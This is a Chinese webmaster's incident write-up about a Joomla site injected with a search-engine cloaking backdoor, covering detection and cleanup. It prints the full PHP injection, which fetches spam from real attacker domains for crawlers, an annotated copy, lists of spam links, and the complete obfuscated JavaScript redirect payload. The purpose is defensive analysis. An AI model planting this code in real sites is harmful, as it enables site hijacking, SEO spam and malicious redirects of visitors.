本文将介绍一下joomlachina.cn遭遇的挂马事件以及对应的处理方法。希望给同样遇到类似攻击的朋友提供一些处理思路。
问题现象
大概一个月之前收到服务器发来的告警信息说网站存在违规内容,因为当时家里有事,就一直没有处理。直到最近才得空处理。但已经造成了惨重的损失。网站被百度给k站了,已经搜索不到任何的内容了。通过site指令,也找不到任何的信息。并且,在百度数据统计里面可以看到出现了很多不属于我站点的关键词出现了。第一感觉就是网站中了木马。
找到木马
我一直想不明白为什么其他不属于我站的关键词会出现在百度的统计数据里面。直到我尝试用百度的抓取工具抓取网站内容的时候才恍然大悟。居然百度抓取的内容和用户使用浏览器看到的内容完全不一样。这个发现让我太震惊了,居然可以这样做!
如何定位木马文件呢?首先我做的就是确认影响的范围,看是部分页面影响还是所有页面影响,最终发现是所有页面都被影响了。那么可以断定应该是joomla核心或者其第三方系统插件被感染了。更改了系统模板,发现问题依然存在,那么就说明不是模板导致的,然后将所有的系统插件逐一关闭排除,发现问题依然存在。那么基本上可以断定是joomla核心文件被感染了。(此时,如果你关心木马长什么样,可以直接升级joomla版本就可以解决挂马的问题了。)
那么具体是哪一个文件呢?一般的黑客对joomla并不熟悉,所以为了确保脚本能够在全站都通用,一般只会更改index.php,framework.php ,include.php ,defind.php这几个公共文件,基本逐一打开之后就可以看到异常文件了。我的情况是framework.php文件被修改了。更加通用的方法就是试用工具查看最近被修改过的php文件。
分析木马
set_time_limit(0);error_reporting(0);$a=stristr;$c=$_SERVER;define('url',$c['REQUEST_URI']);define('ref',$c['HTTP_REFERER']);define('ent',$c['HTTP_USER_AGENT']);define('site','http://red.qweppp.com/?');define('road','road='.$c['HTTP_HOST'].url);define('waps','@Android|Browser|Mobile|Wap|iOs|iPad|iPhone|iPod@i');define('regs','@Baidu|Sogou|Yisou|Sm.cn@i');define('area',$a(url,'.xml')or $a(url,'.doc')or $a(url,'scm')or $a(url,'.txt')or $a(url,'.ppt')or $a(url,'.xls')or $a(url,'.csv')or $a(url,'.shtml'));if(preg_match(regs,ent)){if(area){echo papa(site.road.'&time');exit;}else{echo papa("http://red.qweppp.com/u.php");}}if(area&&preg_match(regs,ref)&&preg_match(waps,ent)){echo papa('http://tz11.zvqsqkz.com/111php.html');exit;}elseif(area){echo '<!--Code:201-->'."\n";}function papa($e){$f=curl_init();curl_setopt($f,CURLOPT_URL,$e);curl_setopt($f,CURLOPT_USERAGENT,ent);curl_setopt($f,CURLOPT_TIMEOUT,30);curl_setopt($f,CURLOPT_RETURNTRANSFER,1);$g=curl_exec($f);return $g;}
上面这就是注入的木马。将这个代码发给AI,重新解释之后就看到了他的真面目了。
<?php
// 1. 取消脚本执行时间限制(避免超时被终止)
set_time_limit(0);
// 2. 关闭所有错误报告(防止暴露问题)
error_reporting(0);
// 3. 定义别名:$a 指向 stristr 函数(用于检测字符串是否包含指定内容,不区分大小写)
$a = stristr;
// 4. 获取服务器变量数组(包含请求信息)
$c = $_SERVER;
// 5. 定义常量:收集当前请求的关键信息
define('url', $c['REQUEST_URI']); // 当前请求的 URI(如 /index.php)
define('ref', $c['HTTP_REFERER']); // 来源页 URL(用户从哪个页面跳转过来)
define('ent', $c['HTTP_USER_AGENT']); // 用户浏览器/爬虫的 User-Agent
define('site', 'http://red.qweppp.com/?'); // 恶意域名1(核心回传地址)
define('road', 'road=' . $c['HTTP_HOST'] . url); // 拼接:road=当前域名+请求URI(如 road=example.com/index.php)
define('waps', '@Android|Browser|Mobile|Wap|iOs|iPad|iPhone|iPod@i'); // 匹配移动设备的正则
define('regs', '@Baidu|Sogou|Yisou|Sm.cn@i'); // 匹配搜索引擎爬虫的正则(百度、搜狗等)
// 6. 检测当前请求是否访问了敏感文件(扩展名包含.xml/.doc/.xls等)
define('area', $a(url, '.xml') || $a(url, '.doc') || $a(url, 'scm') ||
$a(url, '.txt') || $a(url, '.ppt') || $a(url, '.xls') ||
$a(url, '.csv') || $a(url, '.shtml'));
// 7. 核心条件判断:根据请求特征触发回传逻辑
if (preg_match(regs, ent)) { // 条件A:用户是搜索引擎爬虫(如百度蜘蛛)
if (area) { // 子条件:且访问了敏感文件
// 回传:site.road.&time(如 http://red.qweppp.com/?road=example.com/index.php&time)
echo papa(site . road . '&time');
exit; // 终止脚本
} else { // 未访问敏感文件
// 回传:red.qweppp.com/u.php(统计或指令页)
echo papa("http://red.qweppp.com/u.php");
}
}
// 8. 第二组条件判断:移动设备+搜索引擎爬虫+敏感文件
if (area && preg_match(regs, ref) && preg_match(waps, ent)) {
// 回传:tz11.zvqsqkz.com/111php.html(另一个恶意跟踪页)
echo papa('http://tz11.zvqsqkz.com/111php.html');
exit;
} elseif (area) { // 仅访问敏感文件(非爬虫/非移动设备)
// 输出隐藏标记(表明后门已植入)
echo '<!--Code:201-->' . "
";
}
// 9. 恶意请求函数:向外部域名发送 GET 请求并返回结果
function papa($e) {
$f = curl_init(); // 初始化 curl 会话
curl_setopt($f, CURLOPT_URL, $e); // 设置请求 URL(外部恶意域名)
curl_setopt($f, CURLOPT_USERAGENT, ent); // 伪造 User-Agent(用当前请求的 UA)
curl_setopt($f, CURLOPT_TIMEOUT, 30); // 设置超时时间(30秒)
curl_setopt($f, CURLOPT_RETURNTRANSFER, 1); // 不直接输出,返回结果
$g = curl_exec($f); // 执行请求
return $g; // 返回外部服务器的响应
}
?>
看到了这个代码,就理解了为什么我的站点会在搜索引擎里面出现不属于我站点的内容了。首先代码会检查是否是搜索引擎,如果是的, 就拦截,通过curl去远程获得内容。这样我的网站就凭空的多了很多的非法内容了。这些内容并不存储在数据库中,而是动态从远程获得的。不得不说,这个想法非常的巧妙。
进一步追踪
在目录的源文件种,我们可以看到主要的回传网址有两个。http://red.qweppp.com/u.php 和 http://tz11.zvqsqkz.com/111php.html
进一步的追查red.qweppp.com/u.php,发现这个里面仅仅只是输出一些链接,
<a href="/article/2025101787719685-HMMGNL.shtml"></a> <a href="/article/2025101766145-MXMLHNOG.shtml"></a> <a href="/article/2025101743323-HMISA.shtml"></a> <a href="/article/20251017986716-CNTGGXTI.shtml"></a> <a href="/article/2025101740587-FALMUZNQ.shtml"></a> <a href="/article/2025101754525474-WJPWX.shtml"></a> <a href="/article/2025101769755604-NFMRFLL.shtml"></a> <a href="/article/20251017622306-WOXUVE.shtml"></a> <a href="/article/20251017954180-EAXFJ.shtml"></a> <a href="/article/2025101794709-OMEZII.shtml"></a> <a href="/article/202510179733148-ZKHEOSHP.shtml"></a> <a href="/article/20251017532793-PNODAAN.shtml"></a> <a href="/article/2025101798237-MXTPHH.shtml"></a> <a href="/article/202510176218398-WAUZOHWK.shtml"></a> <a href="/article/20251017716228-YABTCMKI.shtml"></a> <a href="/article/20251017666216-ZKAETJ.shtml"></a> <a href="/article/20251017192492-VJLPX.shtml"></a> <a href="/article/2025101744149979-BCKTLNH.shtml"></a> <a href="/article/2025101727357-SRHBV.shtml"></a> <a href="/article/202510174229578-FNVZQ.shtml"></a> <a href="/article/2025101737080916-WPDTT.shtml"></a> <a href="/article/2025101712489-TRFMVR.shtml"></a> <a href="/article/2025101733305347-BEAGMP.shtml"></a> <a href="/article/20251017476730-RKYKSKI.shtml"></a> <a href="/article/2025101773255422-REPUKF.shtml"></a> <a href="/article/2025101774276-HZPATE.shtml"></a> <a href="/article/20251017595991-OULRGZY.shtml"></a> <a href="/article/20251017533654-BQPFEGH.shtml"></a> <a href="/article/202510174102860-WVGRRMRW.shtml"></a> <a href="/article/20251017800993-EZCJCG.shtml"></a> <a href="/article/2025101760627-IRFHXF.shtml"></a> <a href="/article/2025101725884352-YAQQYKPI.shtml"></a> <a href="/article/202510177284306-XQBYNHA.shtml"></a> <a href="/article/20251017246884-AKSPABM.shtml"></a> <a href="/article/2025101788342-FXOJD.shtml"></a> <a href="/article/202510176763314-ATPJU.shtml"></a> <a href="/article/202510172802844-MLNABBB.shtml"></a> <a href="/article/2025101747602-MAXUJ.shtml"></a> <a href="/article/2025101773696656-QBTWGCBU.shtml"></a> <a href="/article/202510172320936-FEEOSJP.shtml"></a> <a href="/article/2025101754185723-XNYDX.shtml"></a> <a href="/article/2025101727356219-OHMXACX.shtml"></a> <a href="/article/2025101739799875-AVAYTDJ.shtml"></a> <a href="/article/2025101722843927-KOAGPWI.shtml"></a> <a href="/article/2025101785513-OXQHJU.shtml"></a> <a href="/article/202510175146929-IJTPRPO.shtml"></a> <a href="/article/20251017900534-RLWXRAMO.shtml"></a> <a href="/article/202510171855975-GUTQTD.shtml"></a> <a href="http://www.tyqcxs.com/article/2025101744090802-JOKZUGQ.shtml"></a> <a href="http://www.scpgyy.com/article/20251017760546-LOJQV.shtml"></a> <a href="http://zhangguisong.com/article/20251017211750-YSRFT.shtml"></a> <a href="http://www.cuw68.com.cn/article/20251017613599-KZLXGJT.shtml"></a> <a href="http://www.acdcdc.com/article/2025101711916-EMXFJ.shtml"></a> <a href="https://www.zhangguisong.com/article/2025101760875667-XRXJJPJG.shtml"></a>
这些就是我的网站中增加的代码了。在这里我们可以看到,最后还有几个其他的中了木马的站点。
另外一个是 https://tz11.zvqsqkz.com/111php.html,这个里面主要是执行一个js脚本。
< script >
var _0xodl = 'jsjiami.com.v7';
var _0x192e24 = _0x42c8;
(function(_0x170108, _0x19ce60, _0x3fa9fc, _0x4ae35e, _0x3c5a28, _0x417d21, _0x342a68) {
return _0x170108 = _0x170108 >> 0x9, _0x417d21 = 'hs', _0x342a68 = 'hs',
function(_0x3ebaff, _0x178b7c, _0x1f125b, _0x2e8459, _0x118618) {
var _0xbe7963 = _0x42c8;
_0x2e8459 = 'tfi', _0x417d21 = _0x2e8459 + _0x417d21, _0x118618 = 'up', _0x342a68 += _0x118618, _0x417d21 = _0x1f125b(_0x417d21), _0x342a68 = _0x1f125b(_0x342a68), _0x1f125b = 0x0;
var _0x7cdb62 = _0x3ebaff();
while (!![] && --_0x4ae35e + _0x178b7c) {
try {
_0x2e8459 = parseInt(_0xbe7963(0x1b4, 'nHm4')) / 0x1 + parseInt(_0xbe7963(0x193, 'KJk!')) / 0x2 * (-parseInt(_0xbe7963(0x1d9, 'YI9&')) / 0x3) + -parseInt(_0xbe7963(0x1a3, 'nHm4')) / 0x4 + -parseInt(_0xbe7963(0x197, '6MY8')) / 0x5 * (-parseInt(_0xbe7963(0x1bd, '9H3o')) / 0x6) + parseInt(_0xbe7963(0x1dd, '$ezs')) / 0x7 + -parseInt(_0xbe7963(0x1c2, 'vOvs')) / 0x8 + parseInt(_0xbe7963(0x1a5, 'CR%w')) / 0x9;
} catch (_0x1b1dd7) {
_0x2e8459 = _0x1f125b;
} finally {
_0x118618 = _0x7cdb62[_0x417d21]();
if (_0x170108 <= _0x4ae35e) _0x1f125b ? _0x3c5a28 ? _0x2e8459 = _0x118618 : _0x3c5a28 = _0x118618 : _0x1f125b = _0x118618;
else {
if (_0x1f125b == _0x3c5a28['replace'](/[LDIAGhXHMYSJUtTgqQ=]/g, '')) {
if (_0x2e8459 === _0x178b7c) {
_0x7cdb62['un' + _0x417d21](_0x118618);
break;
}
_0x7cdb62[_0x342a68](_0x118618);
}
}
}
}
}(_0x3fa9fc, _0x19ce60, function(_0x4aae40, _0x76116, _0x11829d, _0x35cf8a, _0x36bc14, _0xdda70f, _0x24d60b) {
return _0x76116 = 'split', _0x4aae40 = arguments[0x0], _0x4aae40 = _0x4aae40[_0x76116](''), _0x11829d = 'reverse', _0x4aae40 = _0x4aae40[_0x11829d]('v'), _0x35cf8a = 'join', (0x1be83d, _0x4aae40[_0x35cf8a](''));
});
}(0x19800, 0x84a39, _0x3def, 0xce), _0x3def) && (_0xodl = 0xce);
var reg = /(Baiduspider|360Spider|YisouSpider|YandexBot|Sogou inst spider|Sogou web spider|spider)/i;
if (!reg[_0x192e24(0x1b0, 'Yk2o')](navigator[_0x192e24(0x191, 'Yk2o')])) {
let flag = navigator[_0x192e24(0x1d7, 'afP3')][_0x192e24(0x1ce, 'ouXe')](/(phone|pad|pod|iPhone|iPod|ios|iPad|Android|Mobile|BlackBerry|IEMobile|MQQBrowser|JUC|Fennec|wOSBrowser|BrowserNG|WebOS|Symbian|Windows Phone)/i);
if (flag) {
const platformInfo = navigator[_0x192e24(0x1de, '8a!E')];
if (!(platformInfo[_0x192e24(0x1d6, 'm**Y')](_0x192e24(0x186, 'RXJk')) > -0x1 || platformInfo[_0x192e24(0x18b, 'P7fm')](_0x192e24(0x1df, '(tpc')) > -0x1)) {
var arr = [_0x192e24(0x187, 'RP#y'), _0x192e24(0x1a0, '6kvS'), _0x192e24(0x1ae, '[1]8'), _0x192e24(0x1b3, 'Yk2o'), _0x192e24(0x1b7, 'RP#y')],
url = arr[Math[_0x192e24(0x1ca, '$ezs')](Math[_0x192e24(0x199, '(tpc')]() * arr[_0x192e24(0x189, '[ovU')])];
/iphone|ipod|ipad|Macintosh/i [_0x192e24(0x1be, '1^2P')](navigator[_0x192e24(0x18a, 'KJk!')][_0x192e24(0x1a9, 'ek[h')]()) ? window[_0x192e24(0x1e1, '8a!E')][_0x192e24(0x1ab, '%E85')] = url: _1 = url;
document[_0x192e24(0x1af, '1^2P')](_0x192e24(0x1ad, '1^2P'));
var hd = document[_0x192e24(0x1d1, 'ddu9')],
styleCSS = document[_0x192e24(0x1c6, 'KJk!')](_0x192e24(0x192, '1^2P')),
yabo = document[_0x192e24(0x195, 'ouXe')](_0x192e24(0x1d0, '1wHD'));
styleCSS[_0x192e24(0x1cc, 'PlNE')] = _0x192e24(0x1c1, ']syq'), yabo[_0x192e24(0x198, 'KJk!')](_0x192e24(0x1c5, 'r[pl'), _0x192e24(0x1c0, '$ezs')), yabo[_0x192e24(0x18f, 'afP3')] = _0x192e24(0x1a4, 'P7fm') + _1 + _0x192e24(0x1cb, 'a6Hp'), hd[_0x192e24(0x1c3, 'Yk2o')](styleCSS), hd[_0x192e24(0x19a, '[ovU')][_0x192e24(0x19f, 'r[pl')](yabo);
}
}
}
function _0x42c8(_0x348803, _0x11e9f5) {
var _0x3defa0 = _0x3def();
return _0x42c8 = function(_0x42c8a0, _0xebe692) {
_0x42c8a0 = _0x42c8a0 - 0x185;
var _0x4b97a5 = _0x3defa0[_0x42c8a0];
if (_0x42c8['wIgEBw'] === undefined) {
var _0x4f675b = function(_0x32e9f2) {
var _0x4d5662 = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';
var _0x27eef3 = '',
_0x49b085 = '';
for (var _0x3ca7ff = 0x0, _0x4722b2, _0x1430b7, _0x180b51 = 0x0; _0x1430b7 = _0x32e9f2['charAt'](_0x180b51++); ~_0x1430b7 && (_0x4722b2 = _0x3ca7ff % 0x4 ? _0x4722b2 * 0x40 + _0x1430b7 : _0x1430b7, _0x3ca7ff++ % 0x4) ? _0x27eef3 += String['fromCharCode'](0xff & _0x4722b2 >> (-0x2 * _0x3ca7ff & 0x6)) : 0x0) {
_0x1430b7 = _0x4d5662['indexOf'](_0x1430b7);
}
for (var _0x4570a5 = 0x0, _0x7862ac = _0x27eef3['length']; _0x4570a5 < _0x7862ac; _0x4570a5++) {
_0x49b085 += '%' + ('00' + _0x27eef3['charCodeAt'](_0x4570a5)['toString'](0x10))['slice'](-0x2);
}
return decodeURIComponent(_0x49b085);
};
var _0x463051 = function(_0x110b71, _0x387ff6) {
var _0x129e8a = [],
_0x24ef46 = 0x0,
_0x2bddad, _0x2f0a63 = '';
_0x110b71 = _0x4f675b(_0x110b71);
var _0x23a7ba;
for (_0x23a7ba = 0x0; _0x23a7ba < 0x100; _0x23a7ba++) {
_0x129e8a[_0x23a7ba] = _0x23a7ba;
}
for (_0x23a7ba = 0x0; _0x23a7ba < 0x100; _0x23a7ba++) {
_0x24ef46 = (_0x24ef46 + _0x129e8a[_0x23a7ba] + _0x387ff6['charCodeAt'](_0x23a7ba % _0x387ff6['length'])) % 0x100, _0x2bddad = _0x129e8a[_0x23a7ba], _0x129e8a[_0x23a7ba] = _0x129e8a[_0x24ef46], _0x129e8a[_0x24ef46] = _0x2bddad;
}
_0x23a7ba = 0x0, _0x24ef46 = 0x0;
for (var _0x119638 = 0x0; _0x119638 < _0x110b71['length']; _0x119638++) {
_0x23a7ba = (_0x23a7ba + 0x1) % 0x100, _0x24ef46 = (_0x24ef46 + _0x129e8a[_0x23a7ba]) % 0x100, _0x2bddad = _0x129e8a[_0x23a7ba], _0x129e8a[_0x23a7ba] = _0x129e8a[_0x24ef46], _0x129e8a[_0x24ef46] = _0x2bddad, _0x2f0a63 += String['fromCharCode'](_0x110b71['charCodeAt'](_0x119638) ^ _0x129e8a[(_0x129e8a[_0x23a7ba] + _0x129e8a[_0x24ef46]) % 0x100]);
}
return _0x2f0a63;
};
_0x42c8['PVmMnr'] = _0x463051, _0x348803 = arguments, _0x42c8['wIgEBw'] = !![];
}
var _0x3cc465 = _0x3defa0[0x0],
_0x15d91a = _0x42c8a0 + _0x3cc465,
_0x272013 = _0x348803[_0x15d91a];
return !_0x272013 ? (_0x42c8['yyvruY'] === undefined && (_0x42c8['yyvruY'] = !![]), _0x4b97a5 = _0x42c8['PVmMnr'](_0x4b97a5, _0xebe692), _0x348803[_0x15d91a] = _0x4b97a5) : _0x4b97a5 = _0x272013, _0x4b97a5;
}, _0x42c8(_0x348803, _0x11e9f5);
}
var _hmt = _hmt || [];
(function() {
var _0x503760 = _0x192e24,
_0x1759da = {
'xztje': _0x503760(0x188, '6MY8'),
'sNLQk': _0x503760(0x1e0, 'ggYp')
},
_0x5d2bd9 = document[_0x503760(0x1c8, '6kvS')](_0x1759da[_0x503760(0x1aa, 'RXJk')]);
_0x5d2bd9[_0x503760(0x18d, '$C(]')] = _0x1759da[_0x503760(0x1a8, '$O2@')];
var _0x4af0e9 = document[_0x503760(0x1dc, 'w3^Q')](_0x503760(0x1d8, 'Yk2o'))[0x0];
_0x4af0e9[_0x503760(0x1bb, '9H3o')][_0x503760(0x194, '%E85')](_0x5d2bd9, _0x4af0e9);
}());
var _hmt = _hmt || [];
(function() {
var _0x4099b3 = _0x192e24,
_0x19adcf = document[_0x4099b3(0x1a7, '%Soz')](_0x4099b3(0x1bc, '[ovU'));
_0x19adcf[_0x4099b3(0x19d, 'YMSR')] = _0x4099b3(0x1ac, '1^2P');
var _0x55e7da = document[_0x4099b3(0x1e2, 'a6Hp')](_0x4099b3(0x190, 'PlNE'))[0x0];
_0x55e7da[_0x4099b3(0x1da, '%Soz')][_0x4099b3(0x19c, '#5cH')](_0x19adcf, _0x55e7da);
}());
var _hmt = _hmt || [];
function _0x3def() {
var _0x27feef = (function() {
return [_0xodl, 'LMSJjUsTjigHamtYiQq.cYoqmtAJ.vID7ThXhgDG==', 'uComW5ldMmoQ', 'W5BcHCofr8kBpCoPbmk/a8krcq'].concat((function() {
return ['bhpcG8oBWOL1W4BcMCoKW7FdKCoz', 'lSosnrFcPmodWRach0eEamk2', 'f8oWWRpcQMVdGcJcPJfhgt5Zz3VdK8oJWOPdEq', 'lXZcPmkTWQb9za'].concat((function() {
return ['WPBdMCkdm8oFF8oxcSkmoSkIkG', 'W7lcISolECoFpa', 'W6tcTCkSW7e7A8kWpCokW7a', 'C1ne'].concat((function() {
return ['W4iEc8oceWaQW6CVW7DdWOa', 'WOO3WPa', 'ibO7omo6', 'zqTOtCoUnqHhWRSQrW'].concat((function() {
return ['W6W7WQ3cKL85rKzNWO19odZcIrLyvrzIw8kPW5q9WR1rWPVcMHZcLstdH8onoCkktNOKW4FdJYJcUCkbW61nW4G', 'WPldIhVdR8oNAsiZWQn/uComW5G', 'a8oNWQq', 'WQNdSd4jWQVcKGDKx8kkW4hcVmo5'].concat((function() {
return ['EhNdMSoCph1qnv7dRcKv', 'lmk0swpdH8kCW4hcJmkmW6VdGtKnra', 'WRedWQJcS1Xoda', 'oSoLp8k/k31oWRb5ugXawG'].concat((function() {
return ['W6nqW5tcOmkw', 'W6xdSfbWfM/cGftcJfJdPa', 'WOBcHmoqW51C', 'bw/cLCoy'].concat((function() {
return ['sSomW5/dHmo8W5JcKIJcMgZcQCknstxcGdPQm8oNqvbEW7/cM1lcO3eMWQDHkSo6DmogW5BdOIBdKmkzWR9AgSoPWRWeW7iTW69HCLldUmoNxLpcH1NcMmk1', 'hSovW47dGmoUW4ldLxpcHhhcQSkkwsNcJtL5cmkLEt4BW5hdMLxcOc82W70XiSkTyCkDWONcVZhcJmooW7TFdmkqW4KnWQ9XWRKYz17cP8oPaHxdLKddHCk2W7vhb8kVW5/cHCkvWRZcRCopcSorWPxdMNjkWRxcUhBcPSomimoVWP3dPG3dPSoVWRSak01CFCkmBmosW5v3q2edW61utmoUW7xcOtXFWR19WQ7cO3SFqW', 'W78GW73dTSoYxSkDW7LFf8o9neWQg1RcNCk8cHddIqX9W71fCMNdLSoOeXySW7tdN8ohfmkxbmosqMLZaMddMa', 'vCokW4ldGmoQ'].concat((function() {
return ['lIC7fa', 'W67cJmkTW4Ww', 'ba15wuS', 'mJy8emokxmkkfHDKWQpcJ8o+qtVdSCkbr048lSo6gM/dTmoSW5xcI8k0W6iEycfKiIpcM8kAW7/dLCkQWRyCW6BdSq'].concat((function() {
return ['WQNdSJ8iWQ7cLeb9D8koW7JcRq', 'hxZcGSoBWPv1W4RcK8oMW70', 'W7u4cCkvWQNcPmkXW6/cImoGWRLMW6ZcRCkYkCoFnHxdS0HbW5ddRqLPAtG3iSoUW7/cM8kBW6HwWQf8W6/cKYi5W5HuW73dK2rjWOXcWRNcQCogymopWPfxodW', 'WPWZW6pdMCkHwmoLW4PQhmkDbX4CgdhdQLZcTmoRW7zRyc9LW4PAocCKW6NdVCk+dCouzmotBCk4qmonf2VdO8oO'].concat((function() {
return ['WQdcRIWVuZVcG0lcJMddTSkj', 'W5FcMJ/cTSkMka', 'ztjBW7RdQW', 'W60Td8kaWRtdQSoqWQ/cHmoO'].concat((function() {
return ['W6FcT8kSW70LAW', 'WQX+t8ovW67cPSkQWQJcGComW7zmW64', 'vSoDW5JdGa', 'xcZdGSkhW4KWWRxdJCoxW5tdM8o2ha4'].concat((function() {
return ['uHzOW7m', 'WOxdIKZdNuxdOmksyZJcKuXxiq4uw8k4dc0dW5/cQ8o4c8ojCSoCWQHLW60gW7dcHZaFFv9sWOlcLI3cQxiHWOD5WR9LhINcOh3dMeaEWR8LhMRcSmkbWOhdTetdOxq4iu1NWO4NmX9QW5JdMSojW6Guhmk3f8opWQZdJr/dLSkYhv5JWOldM3hdOcSGxInOuJ/dICo+WPldJ8o1WRaPW4qBW6RcV8oxW7XKW4pcQCokWR7cVmore3jmW710WPxdHxBcPmkfW67cMaldPSo7qmk4W4GdWQrPl0pdNH7dUSkzdd1jc2ddQxHNWPCsWRJdMCkfWPmub8oDeCo1W7RdL8oRaHBdJmoskg92WPDlWRySW745jLpdJwNcJSorWPFcVmoDW7e1DGhdOmoIera7WQKGFW', 'cCoIWQGIWQxdPmkwWR/dRSo9xqJdUW', 'oZi4bCoxaSoMurzGWRi'].concat((function() {
return ['FmktyuFdP8krW4mImwm1jSkg', 'zXD5w8oZ', 'WOBdJSkse8oFBSoGd8kliSkZiCkY', 'sNOnWRm8'].concat((function() {
return ['W6C9WRZcG1HMlav6WPHTi3K', 'WQxdMCk7W5NcVs5LomoxWOVdSrFdGIdcQJNcM0pcOH0', 'trTLW7pdKG', 'C1tcKXeaW4WBCmkOFSkBwCo+WRn7W4u3W7OLW4GnW6j3WRZcUa00utqVW6f3W5JdVH90obv4W7ldJmkAWOarFK4CpSo5t8k9WPJcKSogW7CPWPqZWRqUWQKTsCkBW4fpFH95W7fZW5ldOSoEW5tcMfpdNSoSwKldLCkcWQKeyMpdPCoeWRndWOBdImkjWRFdMrldSSooW6NdKCkUW7L/WPhdUghcHfbMW73dI0lcQCohWP7cR8o7W5hdGmo0W7nEWO3dI8oKBCk2W6KlW57cQSo5WObgDq'].concat((function() {
return ['WQf2WQ3cUrbFuCoMW4u', 'zWL9sCo0na5dWRCRrGRdKW', 'imobjbxcUa', 'E8o8WO9+WPpcVSkkCSkIymozWQ/dUW'].concat((function() {
return ['WQBdLCk5', 'WQldP8k5W5y', 'W7u4cCkvWQNcPmkXW6/cImoGWRLMW6ZcRCkYkCoFnHxdS0HbW5ddRqLPAwWXC8oQW7dcK8kFWRjqW7jWW6ZdHhrTWOSgW7VdLJCxW55eWR7cRSobmCkCW4jFAd0', 'l8k9rSowWQy'].concat((function() {
return ['W6hdVM56d37cVhJcIu4', 'FCo5pmkpW5C0WQZdGtlcI10Oxq', 'v8oVqt8Ebt8', 'W43dLSoixCoTAYRcVK8'].concat((function() {
return ['kse6cCojeG', 'y8oPWRdcHcldKbNdOq', 'kCo2kmk7mwXfWRn4wa', 'W4H3W4euW6RcOmktWPmVWRldOCoGWO8'].concat((function() {
return ['W6BdVmoSFJ7cP8oqWQLMyfRdJgfBdmkTzCklWORdSW', 'huC6WQVcKmoQW7NcKCoEW5raW6ZdRq', 'odRcMCoGuw3dRKi', 'W43cISog'].concat((function() {
return ['W4ZcJtNcR8kLzJ9pWQjvpSo9W7uJWRWEnCoYW6P3W6/cHSoCzmoceK3dHYNcLKJcMCkCi8oiWO/dHmo7zSkRFGD1vhpdMSonWPffECkyWRHbDCkSWRadWPpcNa', 'jdNcM8o1q2VdS0e', 'nfFcLtubW4WuESk0BSknACk6W4uQWObzW6G8W5q', 'WPFcKmoxW5jlWOGvqSklW7ddJmoK'].concat((function() {
return ['WO3cNCowW55jWOG', 'WQNcL8ok', 'WPWZW6pdMCkHwmoLW4PUcmkCbH4CgdhdQLZcTmoRW7zRyc9LW4PAocCKW6NdVCk+dCouzmotBCk4qmonf2VdO8oO', 'AtpcP8kvWQbe'].concat((function() {
return ['W7JcSCkWW7mHDW', 'WPddJ8ksamoQBmoadCkA', 'lx7dMmoljv9t', 'W43dH8kwWOijW4OBqmk8W5pdUCoh'].concat((function() {
return ['WPZcL8o0', 'W6/cLmk2W6P9W7lcUCkF', 'W5hdI8odsSoErbVcNxC', 'WRT7WRhcTrjJ'].concat((function() {
return ['lZeTeSo4aCoavWS'];
}()));
}()));
}()));
}()));
}()));
}()));
}()));
}()));
}()));
}()));
}()));
}()));
}()));
}()));
}()));
}()));
}()));
}()));
}()));
}()));
}()));
}()));
}()));
}()));
}());
_0x3def = function() {
return _0x27feef;
};
return _0x3def();
};
(function() {
var _0x48b51c = _0x192e24,
_0x33285c = {
'NEQfK': _0x48b51c(0x185, 'RXJk'),
'Opxhu': _0x48b51c(0x1b6, '9H3o')
},
_0x1363b1 = document[_0x48b51c(0x1cf, '3HAi')](_0x33285c[_0x48b51c(0x1ba, '$ezs')]);
_0x1363b1[_0x48b51c(0x1a2, '@V$o')] = _0x33285c[_0x48b51c(0x1c7, '*j0B')];
var _0x1bb213 = document[_0x48b51c(0x1c9, '1wHD')](_0x33285c[_0x48b51c(0x1b2, 'ngSg')])[0x0];
_0x1bb213[_0x48b51c(0x1b5, '%E85')][_0x48b51c(0x1e3, 'RXJk')](_0x1363b1, _0x1bb213);
}());
var _hmt = _hmt || [];
(function() {
var _0x5bcdc9 = _0x192e24,
_0x244b8b = {
'zXsXC': _0x5bcdc9(0x1b9, 'ggYp'),
'dtJnA': _0x5bcdc9(0x1d2, '9H3o')
},
_0x3a8e3e = document[_0x5bcdc9(0x1cd, 'r[pl')](_0x244b8b[_0x5bcdc9(0x19e, 'Yk2o')]);
_0x3a8e3e[_0x5bcdc9(0x19b, '&Xuf')] = _0x244b8b[_0x5bcdc9(0x1d3, '(vl9')];
var _0xe05786 = document[_0x5bcdc9(0x196, '@V$o')](_0x244b8b[_0x5bcdc9(0x1b1, '[ovU')])[0x0];
_0xe05786[_0x5bcdc9(0x1d4, 'ek[h')][_0x5bcdc9(0x194, '%E85')](_0x3a8e3e, _0xe05786);
}()); < /script>
这个代码做的很一般, 整个页面就是一个js代码,在这个代码里面依据浏览器的类型来创建iframe。在iframe里面随机显示指定的url或者跳转。也就是我们经常在访问颜色网站会出现不断跳转的现象。这里的js代码看起来非常复制,实际上就是试用地方工具做了一个混淆的js加密而已。写这段代码的人水平就一般。
通过分析木马代码和对应木马的服务端代码,整个木马构成非常的简单,没有什么技术含量。我尝试去网信部举报这两个为木马服务的域名,只要能够将这个两个域名封禁,那么所有中此木马的网站就饿可以解决问题了。但举报需要实名认证,填写身份证号码,搞得非常的麻烦。最终也就没有去做了。再此提一点意见,如果能够让举报违法简单化,那么整个网络环境会好很多。
尝试的解决方法
网站之所以会被挂木马,那说明我们的服务器是有漏洞的。对于普通的用户或者程序员去追踪哪一个漏洞导致了这次入侵挂马,这个难度太大。
在此次事件,我们将之前用的centos7服务器更换为阿里云最新的阿里操作系统,这样可以解决操作系统层面的漏洞。另外,将网站程序Joomla升级到了当前版本的最新版本,这样可以解决程序代码的问题。同时也将ftp密码,服务器的密码均进行了重置。初步的解决了这个问题。
关于网站被K的问题
当木马被完全清理之后,要在第一时间去到百度的资源搜索去申诉,申请解封。大概两周就能解封。
评论 (0)